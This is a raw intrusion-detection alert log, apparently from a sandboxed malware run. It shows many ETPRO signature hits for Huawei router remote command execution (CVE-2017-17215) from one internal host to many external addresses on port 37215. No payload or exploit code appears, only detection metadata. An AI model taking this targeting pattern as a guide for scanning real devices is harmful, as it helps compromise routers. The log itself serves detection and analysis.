                                            06/14/24-10:44:06.469682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377037215192.168.2.14197.23.142.71
                                            06/14/24-10:43:56.242407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964637215192.168.2.14197.232.4.152
                                            06/14/24-10:44:31.055261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918437215192.168.2.14197.182.0.21
                                            06/14/24-10:43:34.678513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426037215192.168.2.1441.55.199.105
                                            06/14/24-10:44:24.934309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3536237215192.168.2.1441.253.171.157
                                            06/14/24-10:43:34.676961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879637215192.168.2.14156.240.150.152
                                            06/14/24-10:44:12.615150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502437215192.168.2.14197.99.238.237
                                            06/14/24-10:44:20.806754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327637215192.168.2.1441.9.206.250
                                            06/14/24-10:44:00.323764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5225637215192.168.2.14156.234.65.219
                                            06/14/24-10:44:06.453139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168437215192.168.2.14197.149.86.103
                                            06/14/24-10:44:02.368945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5208237215192.168.2.14156.177.107.254
                                            06/14/24-10:43:41.906203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755237215192.168.2.1441.251.171.133
                                            06/14/24-10:43:58.274114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469237215192.168.2.14156.187.150.135
                                            06/14/24-10:44:02.384220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516837215192.168.2.14197.122.220.106
                                            06/14/24-10:43:48.017962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5924637215192.168.2.1441.222.100.207
                                            06/14/24-10:43:58.292418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5642237215192.168.2.1441.198.148.230
                                            06/14/24-10:44:10.563777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428637215192.168.2.1441.112.86.64
                                            06/14/24-10:43:50.070697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5160037215192.168.2.14197.196.45.173
                                            06/14/24-10:43:52.150295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4420237215192.168.2.14156.136.117.83
                                            06/14/24-10:44:16.735238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689237215192.168.2.14156.143.38.44
                                            06/14/24-10:44:14.684131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997637215192.168.2.1441.247.51.162
                                            06/14/24-10:44:20.827944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5700037215192.168.2.14197.90.144.197
                                            06/14/24-10:44:33.152219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627637215192.168.2.14197.2.32.99
                                            06/14/24-10:44:26.999513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981237215192.168.2.14156.100.226.224
                                            06/14/24-10:43:48.032548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4260037215192.168.2.1441.62.13.208
                                            06/14/24-10:43:54.185200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938237215192.168.2.14156.216.236.189
                                            06/14/24-10:44:35.182924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155037215192.168.2.14156.143.88.155
                                            06/14/24-10:44:14.667800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682237215192.168.2.1441.8.192.206
                                            06/14/24-10:43:52.145616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795637215192.168.2.14197.5.217.22
                                            06/14/24-10:44:22.857840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921837215192.168.2.14197.81.235.113
                                            06/14/24-10:44:27.000628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373837215192.168.2.1441.175.32.248
                                            06/14/24-10:44:06.450704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930637215192.168.2.1441.248.106.182
                                            06/14/24-10:44:24.941957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5764437215192.168.2.1441.186.246.136
                                            06/14/24-10:44:29.011249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429437215192.168.2.14156.212.211.202
                                            06/14/24-10:43:45.967767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427637215192.168.2.1441.135.157.42
                                            06/14/24-10:44:31.083214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838037215192.168.2.14197.91.110.56
                                            06/14/24-10:44:06.473568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882037215192.168.2.1441.128.147.180
                                            06/14/24-10:44:02.368177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491237215192.168.2.1441.29.74.105
                                            06/14/24-10:44:33.133340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727637215192.168.2.14156.33.221.192
                                            06/14/24-10:43:37.761320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4640437215192.168.2.14156.182.131.20
                                            06/14/24-10:44:31.054129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4776837215192.168.2.14156.240.88.129
                                            06/14/24-10:43:36.703573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812637215192.168.2.1441.118.245.14
                                            06/14/24-10:43:58.275490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048837215192.168.2.14197.113.224.204
                                            06/14/24-10:44:16.735594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252837215192.168.2.14197.37.159.10
                                            06/14/24-10:44:35.181614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5332037215192.168.2.1441.238.26.220
                                            06/14/24-10:44:24.941567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3506837215192.168.2.1441.143.223.162
                                            06/14/24-10:44:29.023746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3555837215192.168.2.1441.163.229.118
                                            06/14/24-10:44:08.501141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286037215192.168.2.14197.209.65.247
                                            06/14/24-10:44:20.827681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4067437215192.168.2.14197.199.208.6
                                            06/14/24-10:44:35.180201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819237215192.168.2.14197.201.147.115
                                            06/14/24-10:44:26.980147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473637215192.168.2.14156.224.87.126
                                            06/14/24-10:43:39.810672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448637215192.168.2.14197.209.191.166
                                            06/14/24-10:44:18.761192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3807237215192.168.2.14156.180.39.52
                                            06/14/24-10:43:52.150974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998037215192.168.2.1441.0.226.123
                                            06/14/24-10:44:02.368728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3365837215192.168.2.14156.228.15.171
                                            06/14/24-10:43:56.225826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5909837215192.168.2.1441.173.163.88
                                            06/14/24-10:44:02.365403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844637215192.168.2.1441.165.91.60
                                            06/14/24-10:43:45.990428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3403637215192.168.2.14156.127.168.173
                                            06/14/24-10:44:20.803379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4756437215192.168.2.14197.42.118.46
                                            06/14/24-10:44:18.761607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232837215192.168.2.14197.223.100.164
                                            06/14/24-10:44:22.860682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039237215192.168.2.1441.151.85.42
                                            06/14/24-10:43:36.725049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3703037215192.168.2.14197.132.130.56
                                            06/14/24-10:44:22.882836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3701637215192.168.2.1441.223.94.106
                                            06/14/24-10:44:31.087997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414237215192.168.2.14156.39.249.44
                                            06/14/24-10:43:54.202117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6062037215192.168.2.1441.193.147.208
                                            06/14/24-10:44:04.409924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384837215192.168.2.14197.98.102.95
                                            06/14/24-10:43:36.701496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066437215192.168.2.1441.5.79.61
                                            06/14/24-10:43:58.274436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4480837215192.168.2.14156.205.46.95
                                            06/14/24-10:43:45.984392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5094237215192.168.2.1441.54.22.190
                                            06/14/24-10:44:14.670640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080037215192.168.2.14156.165.145.204
                                            06/14/24-10:43:50.072152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568637215192.168.2.14156.192.177.102
                                            06/14/24-10:44:31.053004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519637215192.168.2.1441.237.107.73
                                            06/14/24-10:43:48.017467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569237215192.168.2.14156.70.59.154
                                            06/14/24-10:44:20.827596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749837215192.168.2.14156.61.171.192
                                            06/14/24-10:43:36.724019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821237215192.168.2.14156.155.254.253
                                            06/14/24-10:44:10.565882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533037215192.168.2.1441.142.5.244
                                            06/14/24-10:44:35.182527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849437215192.168.2.14156.195.57.115
                                            06/14/24-10:43:43.969177TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947237215192.168.2.14197.193.26.48
                                            06/14/24-10:44:02.365529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965837215192.168.2.1441.81.20.17
                                            06/14/24-10:44:22.882246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372037215192.168.2.14156.26.35.74
                                            06/14/24-10:43:41.850138TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686637215192.168.2.1441.31.131.18
                                            06/14/24-10:44:08.501211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890837215192.168.2.14197.236.202.194
                                            06/14/24-10:44:12.624739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4224237215192.168.2.1441.67.11.228
                                            06/14/24-10:43:43.967741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607237215192.168.2.1441.96.11.75
                                            06/14/24-10:44:04.411157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3688237215192.168.2.14197.161.36.247
                                            06/14/24-10:44:33.133267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3612837215192.168.2.14156.244.80.83
                                            06/14/24-10:44:06.452498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3972237215192.168.2.1441.139.68.250
                                            06/14/24-10:44:29.014423TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4844837215192.168.2.1441.170.247.249
                                            06/14/24-10:43:54.181634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994437215192.168.2.1441.77.76.143
                                            06/14/24-10:44:16.716821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3558837215192.168.2.1441.60.59.4
                                            06/14/24-10:44:00.323167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5405637215192.168.2.14197.178.252.78
                                            06/14/24-10:44:00.325448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620837215192.168.2.14197.30.48.151
                                            06/14/24-10:43:41.848536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814437215192.168.2.14156.80.22.52
                                            06/14/24-10:44:24.916548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3446637215192.168.2.14156.63.181.102
                                            06/14/24-10:44:24.941682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3433837215192.168.2.1441.132.89.9
                                            06/14/24-10:43:58.289291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193037215192.168.2.1441.56.14.1
                                            06/14/24-10:44:20.830520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4957437215192.168.2.14156.187.114.42
                                            06/14/24-10:44:00.321886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3623437215192.168.2.14156.201.190.158
                                            06/14/24-10:44:12.614514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3382837215192.168.2.14156.232.150.169
                                            06/14/24-10:44:18.779592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961437215192.168.2.1441.137.225.72
                                            06/14/24-10:44:29.012835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209637215192.168.2.14197.32.145.31
                                            06/14/24-10:44:00.325202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6041837215192.168.2.14156.59.220.205
                                            06/14/24-10:44:14.667077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5881037215192.168.2.14197.82.195.33
                                            06/14/24-10:44:24.915815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000437215192.168.2.14156.61.46.181
                                            06/14/24-10:43:52.159713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5793437215192.168.2.1441.214.32.244
                                            06/14/24-10:43:52.164672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472637215192.168.2.14197.210.132.80
                                            06/14/24-10:44:12.616699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605237215192.168.2.14197.219.59.177
                                            06/14/24-10:44:31.052201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894637215192.168.2.14156.227.132.66
                                            06/14/24-10:43:39.793000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797637215192.168.2.14197.135.152.118
                                            06/14/24-10:43:45.967006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4024637215192.168.2.14156.100.130.131
                                            06/14/24-10:44:29.027455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391037215192.168.2.14156.36.167.12
                                            06/14/24-10:44:00.343279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956437215192.168.2.1441.230.249.72
                                            06/14/24-10:44:00.323541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621637215192.168.2.14197.193.100.115
                                            06/14/24-10:44:18.761513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5234437215192.168.2.14197.183.29.244
                                            06/14/24-10:44:18.766566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442637215192.168.2.14197.233.160.146
                                            06/14/24-10:44:00.322841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343037215192.168.2.14197.13.31.79
                                            06/14/24-10:43:48.021821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5659637215192.168.2.14156.232.9.31
                                            06/14/24-10:43:50.114826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014037215192.168.2.14156.253.49.179
                                            06/14/24-10:44:20.830809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6016837215192.168.2.14197.146.4.5
                                            06/14/24-10:44:33.132490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022837215192.168.2.14197.160.153.170
                                            06/14/24-10:44:12.644391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4347637215192.168.2.14156.246.207.49
                                            06/14/24-10:44:26.979617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311237215192.168.2.14156.170.67.218
                                            06/14/24-10:44:10.567550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775037215192.168.2.14156.152.84.34
                                            06/14/24-10:44:26.977372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4537437215192.168.2.14197.159.178.152
                                            06/14/24-10:44:10.548320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474637215192.168.2.1441.149.138.214
                                            06/14/24-10:43:56.227542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967837215192.168.2.14156.41.140.105
                                            06/14/24-10:44:26.998572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3405437215192.168.2.1441.197.194.197
                                            06/14/24-10:43:48.033054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3616237215192.168.2.14197.106.235.126
                                            06/14/24-10:43:36.727895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124837215192.168.2.14197.153.188.163
                                            06/14/24-10:44:35.179454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708437215192.168.2.14197.248.93.41
                                            06/14/24-10:43:48.045758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5585237215192.168.2.1441.225.161.130
                                            06/14/24-10:44:08.504467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499637215192.168.2.14197.13.80.17
                                            06/14/24-10:44:04.406694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4772237215192.168.2.1441.103.13.39
                                            06/14/24-10:44:14.667723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920837215192.168.2.1441.98.10.13
                                            06/14/24-10:43:58.293355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5128637215192.168.2.1441.57.134.209
                                            06/14/24-10:44:22.881024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243037215192.168.2.14197.162.189.80
                                            06/14/24-10:44:16.735628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5645437215192.168.2.14156.173.15.250
                                            06/14/24-10:44:33.148878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242237215192.168.2.14156.192.205.22
                                            06/14/24-10:44:29.025791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5801837215192.168.2.14197.10.234.221
                                            06/14/24-10:43:54.202877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041437215192.168.2.14197.162.242.42
                                            06/14/24-10:44:24.917151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092237215192.168.2.14156.156.82.106
                                            06/14/24-10:44:16.734143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4046837215192.168.2.14156.232.171.137
                                            06/14/24-10:44:04.410768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4058637215192.168.2.1441.31.56.14
                                            06/14/24-10:44:04.412227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3333837215192.168.2.14156.15.23.33
                                            06/14/24-10:44:08.501989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141637215192.168.2.1441.185.155.2
                                            06/14/24-10:44:20.828016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092237215192.168.2.14197.81.99.4
                                            06/14/24-10:44:10.567036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5959037215192.168.2.14197.42.159.59
                                            06/14/24-10:44:22.859219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689637215192.168.2.1441.229.136.70
                                            06/14/24-10:43:36.703633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4962037215192.168.2.14197.94.195.84
                                            06/14/24-10:44:31.050916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118437215192.168.2.1441.104.82.85
                                            06/14/24-10:43:52.148818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4837637215192.168.2.14156.99.176.180
                                            06/14/24-10:43:52.164430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677637215192.168.2.1441.9.223.119
                                            06/14/24-10:43:41.897278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422437215192.168.2.1441.240.145.233
                                            06/14/24-10:43:36.723275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427637215192.168.2.1441.96.204.199
                                            06/14/24-10:43:45.968899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054637215192.168.2.14156.76.247.65
                                            06/14/24-10:44:16.733335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291837215192.168.2.1441.94.117.243
                                            06/14/24-10:43:50.072994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722637215192.168.2.14197.217.211.188
                                            06/14/24-10:44:12.617805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3456037215192.168.2.1441.229.90.128
                                            06/14/24-10:44:12.625562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5557237215192.168.2.14156.233.172.79
                                            06/14/24-10:44:31.091652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006037215192.168.2.1441.167.138.43
                                            06/14/24-10:44:33.152866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289637215192.168.2.1441.54.150.206
                                            06/14/24-10:44:24.942517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6028437215192.168.2.14197.53.75.96
                                            06/14/24-10:43:41.850271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4620837215192.168.2.1441.136.10.6
                                            06/14/24-10:44:26.978763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3296637215192.168.2.14156.98.82.18
                                            06/14/24-10:44:35.178064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5477037215192.168.2.14197.22.16.220
                                            06/14/24-10:43:54.183476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4983437215192.168.2.14197.222.80.165
                                            06/14/24-10:43:36.699465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560837215192.168.2.14197.23.121.148
                                            06/14/24-10:43:58.277395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3325037215192.168.2.14156.125.140.72
                                            06/14/24-10:44:33.150419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5957037215192.168.2.14197.111.20.21
                                            06/14/24-10:43:41.847555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465837215192.168.2.14197.174.4.170
                                            06/14/24-10:44:33.148785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4221037215192.168.2.1441.245.183.126
                                            06/14/24-10:44:22.859680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080437215192.168.2.14197.247.223.46
                                            06/14/24-10:44:24.915949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717437215192.168.2.1441.221.165.6
                                            06/14/24-10:43:41.898056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016237215192.168.2.1441.223.35.223
                                            06/14/24-10:44:20.805881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800237215192.168.2.14156.62.62.219
                                            06/14/24-10:44:29.022613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544637215192.168.2.14197.239.40.54
                                            06/14/24-10:44:16.716459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4943837215192.168.2.14197.17.206.13
                                            06/14/24-10:43:43.970953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889437215192.168.2.14156.56.50.212
                                            06/14/24-10:44:08.519711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3792037215192.168.2.1441.250.133.178
                                            06/14/24-10:43:52.164847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344437215192.168.2.14197.67.80.64
                                            06/14/24-10:43:43.940803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099037215192.168.2.1441.95.185.53
                                            06/14/24-10:43:36.699275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410637215192.168.2.1441.67.94.127
                                            06/14/24-10:43:37.758888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312437215192.168.2.1441.117.173.189
                                            06/14/24-10:43:56.246330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560637215192.168.2.14156.105.1.221
                                            06/14/24-10:44:08.502269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830637215192.168.2.1441.188.100.58
                                            06/14/24-10:44:24.914803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180837215192.168.2.14156.210.114.76
                                            06/14/24-10:43:52.159223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5044837215192.168.2.1441.184.220.160
                                            06/14/24-10:44:16.734765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5018037215192.168.2.1441.53.249.183
                                            06/14/24-10:44:06.453792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400237215192.168.2.14197.223.93.26
